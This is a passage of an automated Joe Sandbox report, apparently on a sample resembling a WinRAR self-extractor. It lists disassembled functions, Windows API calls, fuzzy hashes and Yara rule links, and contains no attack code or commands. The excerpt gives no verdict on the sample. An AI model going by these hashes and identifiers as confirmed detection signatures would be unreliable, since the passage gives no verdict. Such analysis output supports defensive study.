                                                                                                                                                                            • Opcode Fuzzy Hash: 9c3b82ba00a4045b869114ebc099bd9b89e1c5bd21d2db66b0e2a035eb3d13e2
                                                                                                                                                                            • Instruction Fuzzy Hash: 33319FB1A2020AABDF25DF65DC85DAF7BA9EB40350F144168FC08D6250EB35CEA0DB90
                                                                                                                                                                            Function 0025126C Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00251273
                                                                                                                                                                              • Part of subcall function 0025067E: GetVersionExW.KERNEL32(?), ref: 002506AF
                                                                                                                                                                            • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0024350C,6294DAAA,00000000,?,?,002443F5,?,?,?,00000000), ref: 0025129A
                                                                                                                                                                            • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 002512D4
                                                                                                                                                                            • _wcslen.LIBCMT ref: 002512DF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FoldString$H_prolog3Version_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 535866816-0
                                                                                                                                                                            • Opcode ID: 2bc7d47ee5327705f8f7114aac8540130d613be0fcd09c46f965ce1d68715e5e
                                                                                                                                                                            • Instruction ID: 2cb3041ece37778e8f0342657d05f763501df8b2241c225a3991b03ed6e2d2b4
                                                                                                                                                                            • Opcode Fuzzy Hash: 2bc7d47ee5327705f8f7114aac8540130d613be0fcd09c46f965ce1d68715e5e
                                                                                                                                                                            • Instruction Fuzzy Hash: A5117771A21126ABDB049FA9CD4AA7F7B7DAF45721F100209BD10E72C1CB7099B0CAF5
                                                                                                                                                                            Function 002562CD Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 002562D4
                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 002562EB
                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00256328
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00256338
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3741103063-0
                                                                                                                                                                            • Opcode ID: e5dd8ab55ec7d2a3eb51938d2cffdf2386c192c0695bbd3218753fe5b224a7c7
                                                                                                                                                                            • Instruction ID: f6de561be27674f69cfa7bd408d28efcbad990295cab94a37081239af986b970
                                                                                                                                                                            • Opcode Fuzzy Hash: e5dd8ab55ec7d2a3eb51938d2cffdf2386c192c0695bbd3218753fe5b224a7c7
                                                                                                                                                                            • Instruction Fuzzy Hash: BB11E070A2121AAF9B049FA8DD899BFF779FF40311B50011DB801E7240DB309DA4CBE8
                                                                                                                                                                            Function 002719E4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0027198B,00000000,00000000,00000000,00000000,?,00271B88,00000006,FlsSetValue), ref: 00271A16
                                                                                                                                                                            • GetLastError.KERNEL32(?,0027198B,00000000,00000000,00000000,00000000,?,00271B88,00000006,FlsSetValue,00280DD0,FlsSetValue,00000000,00000364,?,002700D7), ref: 00271A22
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0027198B,00000000,00000000,00000000,00000000,?,00271B88,00000006,FlsSetValue,00280DD0,FlsSetValue,00000000), ref: 00271A30
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                            • Opcode ID: 93ddd973cba3ed1b8b4dec8c512155d1b7491771facd41c8c5b54afc00600918
                                                                                                                                                                            • Instruction ID: 4e892e306295459caba5b6d494e8ead4058475a367ecac44d6edee1ff27696a5
                                                                                                                                                                            • Opcode Fuzzy Hash: 93ddd973cba3ed1b8b4dec8c512155d1b7491771facd41c8c5b54afc00600918
                                                                                                                                                                            • Instruction Fuzzy Hash: E601D4366662339BC7218EBCAC48E567798AF04BA1B214624ED0ED3240D730D870C6E0
                                                                                                                                                                            Function 00251309 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00251310
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002517FB,?,?,\\?\,6294DA82,?,?,?,00000000,0027A279,000000FF), ref: 00251319
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,0027A279,000000FF), ref: 00251348
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00251351
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$H_prolog3_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 19219720-0
                                                                                                                                                                            • Opcode ID: 538557d8e1b56da6ae0610df55044b748d4020a7be1f6014378c7641a742a823
                                                                                                                                                                            • Instruction ID: c25f6dfebbac96f92e0e22c725c63ba24f56d18f5ea8dffca00b115a838a2ca3
                                                                                                                                                                            • Opcode Fuzzy Hash: 538557d8e1b56da6ae0610df55044b748d4020a7be1f6014378c7641a742a823
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D01DB71D20126BB8B04AFF49D159BFBB7DAF81720B100209B915E7241CF744960CAE5
                                                                                                                                                                            Function 0025EB74 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 0025EB77
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0025EB86
                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0025EB94
                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0025EBA2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1035833867-0
                                                                                                                                                                            • Opcode ID: 86e461a80422a95b0f469409fb1a000001ee93cd757534ed12e1ccbc9a82cc8b
                                                                                                                                                                            • Instruction ID: 3f665b7d3da5aead2e4254b2eebd857a52c24d9f5ce319f7e9ba05ce2b442b4f
                                                                                                                                                                            • Opcode Fuzzy Hash: 86e461a80422a95b0f469409fb1a000001ee93cd757534ed12e1ccbc9a82cc8b
                                                                                                                                                                            • Instruction Fuzzy Hash: 82E01231A5AF30ABD7221B70BD0DB8B3F54AF19B53F010183FB05AA1D0C6B044008B98
                                                                                                                                                                            Function 00257C68 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00258294
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                              • Part of subcall function 0026087E: __EH_prolog3_GS.LIBCMT ref: 00260885
                                                                                                                                                                              • Part of subcall function 0026087E: GetLastError.KERNEL32(0000001C,00258244,?,00000000,00000086,?,6294DA82,?,?,?,?,?,00000000,0027A75D,000000FF), ref: 0026089D
                                                                                                                                                                              • Part of subcall function 0026087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,0027A75D,000000FF), ref: 002608D6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
                                                                                                                                                                            • String ID: %ls
                                                                                                                                                                            • API String ID: 1279724102-3246610740
                                                                                                                                                                            • Opcode ID: a818b0f7265bd9c7d131e9f2082b28acbf900e016f200b3f8f94c81c46496773
                                                                                                                                                                            • Instruction ID: e7a37c34e774349f528b4bc9ee8b51543a5be7c9e743cf30b01fc59857e24752
                                                                                                                                                                            • Opcode Fuzzy Hash: a818b0f7265bd9c7d131e9f2082b28acbf900e016f200b3f8f94c81c46496773
                                                                                                                                                                            • Instruction Fuzzy Hash: 62B1C130861209EADB38EF50CD46FAE7BB5BF15346F204419F846621E1DBB15A78EF84
                                                                                                                                                                            Function 002728A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0027246B: GetOEMCP.KERNEL32(00000000,?,?,002726F4,?), ref: 00272496
                                                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00272739,?,00000000), ref: 00272914
                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,9'',?,?,?,00272739,?,00000000), ref: 00272927
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                                                            • String ID: 9''
                                                                                                                                                                            • API String ID: 546120528-2872311811
                                                                                                                                                                            • Opcode ID: 96e8627ac5f0889b48df6671778723dcda1b3d2e8a8699af122c95be247b8913
                                                                                                                                                                            • Instruction ID: 884784ae571fcf9900168d7e5d940f9e7e953e3d81a5a5a6efe197306c525962
                                                                                                                                                                            • Opcode Fuzzy Hash: 96e8627ac5f0889b48df6671778723dcda1b3d2e8a8699af122c95be247b8913
                                                                                                                                                                            • Instruction Fuzzy Hash: EA513770920247DFDB25CF35C8916BBBBE5EF41300F28C06ED19E87252D6759999CB90
                                                                                                                                                                            Function 00271E68 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _free.LIBCMT ref: 00271FD4
                                                                                                                                                                              • Part of subcall function 0026ACBB: IsProcessorFeaturePresent.KERNEL32(00000017,0026AC8D,0026535E,?,?,00000000,0026535E,00000016,?,?,0026AC9A,00000000,00000000,00000000,00000000,00000000), ref: 0026ACBD
                                                                                                                                                                              • Part of subcall function 0026ACBB: GetCurrentProcess.KERNEL32(C0000417,?,0026535E), ref: 0026ACDF
                                                                                                                                                                              • Part of subcall function 0026ACBB: TerminateProcess.KERNEL32(00000000,?,0026535E), ref: 0026ACE6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                            • String ID: *?$.
                                                                                                                                                                            • API String ID: 2667617558-3972193922
                                                                                                                                                                            • Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                                                                                                                                            • Instruction ID: 2b8c6188cd45579beb8c138f01c9c269efe60454573d56fcf7d88650271ce05f
                                                                                                                                                                            • Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
                                                                                                                                                                            • Instruction Fuzzy Hash: 4651B075E1021AEFDF14DFA8C881AADBBB5FF48310F248169E848E7741E7759E218B50
                                                                                                                                                                            Function 00272543 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00272568
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Info
                                                                                                                                                                            • String ID: $}*'
                                                                                                                                                                            • API String ID: 1807457897-3204145712
                                                                                                                                                                            • Opcode ID: 657bf1320d3de5c5f5999ef76061e4f91062c29d5ad664b52f4bdafb76681a37
                                                                                                                                                                            • Instruction ID: d43e746c0d302023e45af0b1322ab5828605f9f934ec9374d8c2f6ebc8303fbe
                                                                                                                                                                            • Opcode Fuzzy Hash: 657bf1320d3de5c5f5999ef76061e4f91062c29d5ad664b52f4bdafb76681a37
                                                                                                                                                                            • Instruction Fuzzy Hash: 07412AB0514258DFDF268E24CC84BF6BBFDEB45304F2444EDE58E86142D235AA69DF60
                                                                                                                                                                            Function 0024F103 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 002579F7: GetSystemTime.KERNEL32(?,00000000), ref: 00257A0F
                                                                                                                                                                              • Part of subcall function 002579F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00257A1D
                                                                                                                                                                              • Part of subcall function 002579A0: __aulldiv.LIBCMT ref: 002579A9
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0024F162
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,6294DA82,?,?,00000000,?,00000000,00279F3D,000000FF), ref: 0024F169
                                                                                                                                                                              • Part of subcall function 00241150: _wcslen.LIBCMT ref: 0024115B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                                                                                                                                            • String ID: .rartemp
                                                                                                                                                                            • API String ID: 3789791499-2558811017
                                                                                                                                                                            • Opcode ID: 17d65bcc50821241cb0bc041a850dbd240927ca7ed9265176fa1b2ecafc0358a
                                                                                                                                                                            • Instruction ID: 178118f115450535aa25007c5a8436112f2b446797ceaf39207ddc3b2a35999d
                                                                                                                                                                            • Opcode Fuzzy Hash: 17d65bcc50821241cb0bc041a850dbd240927ca7ed9265176fa1b2ecafc0358a
                                                                                                                                                                            • Instruction Fuzzy Hash: 35418071920249ABDF18EF74CC46EEEB7A8EF54310F444129F91993281EB749B68CF60
                                                                                                                                                                            Function 0025DACE Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0025DAD5
                                                                                                                                                                              • Part of subcall function 00250360: __EH_prolog3.LIBCMT ref: 00250367
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID: Shell.Explorer$about:blank
                                                                                                                                                                            • API String ID: 431132790-874089819
                                                                                                                                                                            • Opcode ID: 89d766b82a0dab7d8f906b6b92c7c19f9f5a7b218b9d3dfcb0341cbb3553ef2a
                                                                                                                                                                            • Instruction ID: e30798e8951f25bda510e3e4d75ae5f679acdd2bc1b0eb3a67ab5da3f45b1076
                                                                                                                                                                            • Opcode Fuzzy Hash: 89d766b82a0dab7d8f906b6b92c7c19f9f5a7b218b9d3dfcb0341cbb3553ef2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E418070620212DFDB18DFA4C855B2A77B2AF88706F15809DED069F292DB70AD54CF54
                                                                                                                                                                            Function 0025D7EB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025D7F2
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0025D8E8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_ShowWindow
                                                                                                                                                                            • String ID: qI&
                                                                                                                                                                            • API String ID: 4203566401-1506060996
                                                                                                                                                                            • Opcode ID: feca26ea35dee679413e8261a038e7387af45c6dc32bd5187a26f3b2e5b582ec
                                                                                                                                                                            • Instruction ID: 1575d85de2886f1a6d6f9bd39070ad00469559e495656488537eb3e922ec62ee
                                                                                                                                                                            • Opcode Fuzzy Hash: feca26ea35dee679413e8261a038e7387af45c6dc32bd5187a26f3b2e5b582ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 57416B30A2062AAFCB15DFA4DC89A9DBBF5FF0C311B044029F909A7261DB71AC55CF94
                                                                                                                                                                            Function 00260110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 0026017B
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 002601B9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemText$DialogWindow
                                                                                                                                                                            • String ID: GETPASSWORD1
                                                                                                                                                                            • API String ID: 445417207-3292211884
                                                                                                                                                                            • Opcode ID: 46153d0de2a429db88ad58e59ed745d9079751e785d0eedc10a43d01267f273c
                                                                                                                                                                            • Instruction ID: 04124c4a412184beafd941221356faf87b858e71a8173ab2a9fac01f96391027
                                                                                                                                                                            • Opcode Fuzzy Hash: 46153d0de2a429db88ad58e59ed745d9079751e785d0eedc10a43d01267f273c
